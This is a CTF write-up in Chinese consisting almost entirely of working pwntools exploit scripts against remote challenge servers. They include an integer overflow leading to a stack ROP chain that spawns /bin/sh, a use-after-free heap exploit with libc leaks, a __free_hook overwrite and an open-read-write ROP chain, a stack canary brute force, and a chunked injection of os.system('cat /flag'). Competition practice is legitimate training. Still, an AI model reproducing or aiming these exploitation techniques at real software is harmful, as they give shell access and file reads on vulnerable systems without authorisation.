PWN

烧烤摊儿

整数溢出，栈溢出

# -*- coding: UTF-8 -*-
from pwn import *

io = remote('39.106.71.184', 37247)
context.binary = 'shaokao'

sd          = lambda x          : io.send(x)
sl          = lambda x          : io.sendline(x)
sla         = lambda a, b       : io.sendlineafter(a, b)
ia          = lambda            : io.interactive()

def menu(choice):
    sla('> ', str(choice))

menu(1)
sla('3. 勇闯天涯\n', '1')
sl('4294767296')
menu(4)
syscall = 0x00000000004230a6
pop_rdi = 0x000000000040264f
pop_rsi = 0x000000000040a67e
pop_rdx = 0x00000000004a404b
pop_rax = 0x0000000000458827
menu(5)
rop_chain = flat([
    pop_rdi,
    0,
    pop_rsi,
    0x00000000004E82C0 + 0x300,
    pop_rdx,
    0x30, 0,
    pop_rax,
    0,
    syscall,
    pop_rdi,
    0x00000000004E82C0 + 0x300,
    pop_rsi,
    0,
    pop_rdx,
    0, 0,
    pop_rax,
    0x3b,
    syscall
])
sl(flat({0x28: rop_chain}))
sd('/bin/sh\x00')
ia()

StrangeTalkBot

UAF

# -*- coding: UTF-8 -*-
from pwn import *

io = remote('123.56.251.120', 30889)
context.binary = 'pwn'
libc = ELF('libc-2.31.so', checksec = False)

rc          = lambda n          : io.recv(n)
sa          = lambda a, b       : io.sendafter(a, b)
ia          = lambda            : io.interactive()
uu64        = lambda x          : u64(x.ljust(8, '\x00'))
libc_os     = lambda x          : libc_base + x
heap_os     = lambda x          : heap_base + x
libc_sym    = lambda x          : libc_os(libc.sym[x])

def varint(n):
    b = bin(n)[2:][::-1]
    bs = [int(b[i:i + 7][::-1].rjust(7, "0"), 2) for i in range(0, len(b), 7)]
    ans = bytearray()
    for x in bs[:-1]:
        ans.append(x | 0x80)
    ans.append(bs[-1])
    return bytes(ans)

def zz(n):
    return varint((n << 1) ^ (n >> 63))

def add(msg_idx, size, content):
    msg_idx = zz(msg_idx)
    size = zz(size)
    pld = '\x08\x02' + '\x10' + msg_idx + '\x18' + size + '\x22' + chr(len(content)) + content
    sa('You can try to have friendly communication with me now: \n', pld)

def delete(msg_idx):
    msg_idx = zz(msg_idx)
    pld = '\x08\x08' + '\x10' + msg_idx + '\x18' + zz(1) + '\x22' + chr(1) + 'a'
    sa('You can try to have friendly communication with me now: \n', pld)

def show(msg_idx):
    msg_idx = zz(msg_idx)
    pld = '\x08\x06' + '\x10' + msg_idx + '\x18' + zz(1) + '\x22' + chr(1) + 'a'
    sa('You can try to have friendly communication with me now: \n', pld)

def edit(msg_idx, size, content):
    msg_idx = zz(msg_idx)
    size = zz(size)
    pld = '\x08\x04' + '\x10' + msg_idx + '\x18' + size + '\x22' + chr(len(content)) + content
    sa('You can try to have friendly communication with me now: \n', pld)

for i in range(0xa):
    add(i, 0xf0, 'junk')
for i in range(8):
    delete(i)
add(0xa, 0x7, 'a')
show(0xa)
libc_base = uu64(rc(6)) - (0x7f643a39fb61 - 0x7f643a1b3000)
show(1)
heap_base = uu64(rc(6)) - (0x558ebc274310 - 0x558ebc274000)
open_addr = libc_sym('open')
write_addr = libc_sym('write')
read_addr = libc_sym('read')
leave = libc_os(0x00000000000578c8)
pop_rdi = libc_os(0x0000000000023b6a)
pop_rsi = libc_os(0x000000000002601f)
pop_rdx_r12 = libc_os(0x0000000000119211)
rop_addr = heap_os(0x55a7d4e78760 - 0x55a7d4e78000)
rop_addr1 = heap_os(0x55edb3551000 - 0x55edb3550000)
flag_addr = heap_os(0x55a6c5922bb0 - 0x55a6c5922000 + 0x10)
fh_addr = libc_sym('__free_hook')
rop_chain = flat([
    rop_addr1 - 8,
    pop_rdi,
    heap_os(0x55d2fefa6550 - 0x55d2fefa5000),
    pop_rsi,
    0,
    open_addr,
    pop_rdi,
    3,
    pop_rsi,
    heap_os(0x100),
    leave,
])
rop_chain1 = flat([
    pop_rdx_r12,
    0x30,
    0,
    read_addr,
    pop_rdi,
    1,
    write_addr
])
pld = flat({
    0: rop_addr,
    0x8: leave,
    0x10: 'flag\x00',
    0x18: flag_addr - 0x10,
    0x28: leave,
    0x48: flag_addr - 0x10
})
add(0xb, 0xf0, pld)
edit(0x3, 0xf0, rop_chain)
edit(0x9, 0xf0, rop_chain1)

add(0xc, 0xf0, 'junk')
delete(0xc)
edit(0xc, 0xf0, flat(fh_addr))
add(0xd, 0xf0, 'a')
gadget = libc_os(0x0000000000154DEA)
add(0xe, 0xf0, flat(gadget))
delete(0xb)
ia()

funcanary

子进程爆破

# -*- coding: UTF-8 -*-
from pwn import *

io = remote('47.94.206.10', 18332)
context.binary = 'funcanary'
elf = ELF('funcanary', checksec = False)

ru          = lambda x          : io.recvuntil(x, drop = True)
sd          = lambda x          : io.send(x)
sa          = lambda a, b       : io.sendafter(a, b)
sla         = lambda a, b       : io.sendlineafter(a, b)
ia          = lambda            : io.interactive()
uu64        = lambda x          : u64(x.ljust(8, '\x00'))

canary = ''
while len(canary) < 8:
    recv_d = ''
    for i in range(0, 0xff + 1):
        canary1 = canary
        canary1 += chr(i) 
        pld = flat({0x68: canary1}, filler = '\x00')
        sa('welcome\n', pld)
        recv_d = ru('\n')
        if 'stack' not in recv_d:
            canary += chr(i)
            if len(canary) == 8:
                break

for i in range(0x02, 0xf2 + 0x10, 0x10):
    pld = flat({
        0x68: canary,
        0x78: '\x2e' + chr(i)
    })
    sd(pld)
    data = io.recv(timeout = 0.25)
    if 'flag' in data:
        print data
        break
ia()

捡了个3血（

Misc

pyshell

一次最多输入7字节的数据，用脚本将数据分成几次输入构造出

1 2	import os os.system('cat /flag')

即可

# -*- coding: UTF-8 -*-
from pwn import *
import time
context.log_level='debug'
_, host, port = "nc 123.57.248.214 17297".strip().split()
port = int(port)
context.log_level='debug'
io = remote(host, port)
io.sendafter(">>", 'import ')
io.sendafter(">>", 'os\n')
io.sendafter(">>", 'os.syst')
io.sendafter(">>", 'em(\'cat')
io.sendafter(">>", ' /flag\'')
io.sendafter(">>", ')')
io.interactive()